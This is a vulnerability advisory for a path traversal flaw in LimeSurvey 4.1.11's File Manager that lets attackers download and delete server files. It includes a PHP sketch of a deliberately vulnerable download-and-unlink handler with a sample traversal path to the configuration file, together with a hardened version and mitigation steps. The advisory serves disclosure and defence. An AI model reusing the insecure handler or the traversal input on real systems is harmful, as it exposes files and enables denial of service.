Vendor: LimeSurvey
By: Matthew Aberegg, Michael Burkey
CVSS: 9.8 (Critical)
CWE: CWE-22 Path Traversal
Product Name: LimeSurvey
Affected Version From: LimeSurvey 4.1.11+200316
Affected Version To: LimeSurvey 4.1.11+200316
Patch Exists: YES
Related CVE: CVE-2020-11455
CPE: a:limesurvey:limesurvey:4.1.11+200316
Other Scripts:
N/A
Platforms Tested: Ubuntu 18.04.4
Year: 2020
LimeSurvey 4.1.11 – ‘File Manager’ Path Traversal
A path traversal vulnerability in the 'File Manager' functionality of LimeSurvey 4.1.11+200316 allows an attacker to download arbitrary files that the web server account can read. The file manager also deletes the file after it has been downloaded (provided the web server account has permission to delete it), so an attacker can cause a denial of service by requesting a critical LimeSurvey configuration file, which is then removed from disk.
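The following PHP sketch is an added illustration and is not LimeSurvey's own code. It shows a download handler in the shape the advisory describes (a request-supplied path joined to a base directory, the file streamed and then unlinked) beside a hardened version that resolves the path with realpath() and rejects anything outside the base directory. The base directory, the function names and the 'path' request parameter are assumptions made for the example.

```php
<?php
// Added example, not LimeSurvey code. UPLOAD_DIR, the function names and the
// 'path' request parameter are hypothetical.
const UPLOAD_DIR = '/var/www/limesurvey/upload';   // assumed base directory

// VULNERABLE pattern: the request path is concatenated onto the base directory
// without normalisation, so a value such as
//   ../../application/config/config.php
// escapes the directory. After streaming the file the handler unlinks it, which
// is the denial-of-service angle the advisory describes: the configuration file
// is gone once the web server account is allowed to delete it.
function downloadAndDeleteUnsafe(string $requested): void
{
    $file = UPLOAD_DIR . '/' . $requested;
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($file);
    unlink($file);   // deletes whatever $file resolved to, if permissions allow
}

// HARDENED: resolve both the base directory and the target with realpath(),
// which collapses "..", "." and symlinks and returns false for paths that do
// not exist, then require the target to sit strictly inside the base.
function resolveInside(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $target = realpath($base . $requested);
    if ($target === false) {
        return null;
    }
    // Prefix check against the separator-terminated base, so that
    // ".../upload2/x" is not accepted for base ".../upload".
    if (strncmp($target, $base, strlen($base)) !== 0) {
        return null;
    }
    return $target;
}

function downloadSafe(string $requested): void
{
    $file = resolveInside(UPLOAD_DIR, $requested);
    if ($file === null || !is_file($file)) {
        http_response_code(400);
        exit('invalid path');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($file);
    // No unlink here. If a temporary archive must be cleaned up, remove only a
    // file this handler itself created inside a dedicated temporary directory,
    // never a path derived from the request.
}

// Usage (assumed request parameter):
// downloadSafe($_GET['path'] ?? '');
```

Because realpath() follows symlinks before the prefix comparison, a symlink placed inside the upload directory that points at a file elsewhere is rejected as well. The check only protects the code path it is applied to; the permission hardening in the mitigation below limits the blast radius of any handler that still deletes files.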
Mitigation:
Apply the vendor patch (a fix exists for this version). As an interim hardening step, ensure that the web server account cannot delete files outside the directories it must write to, such as the upload and temporary directories. Deleting a file requires write permission on its containing directory, so the application code and configuration directories should be owned by a separate account and be read-only for the web server. Note that restricting permissions only prevents the denial of service; it does not stop the arbitrary file read, which only the patch addresses.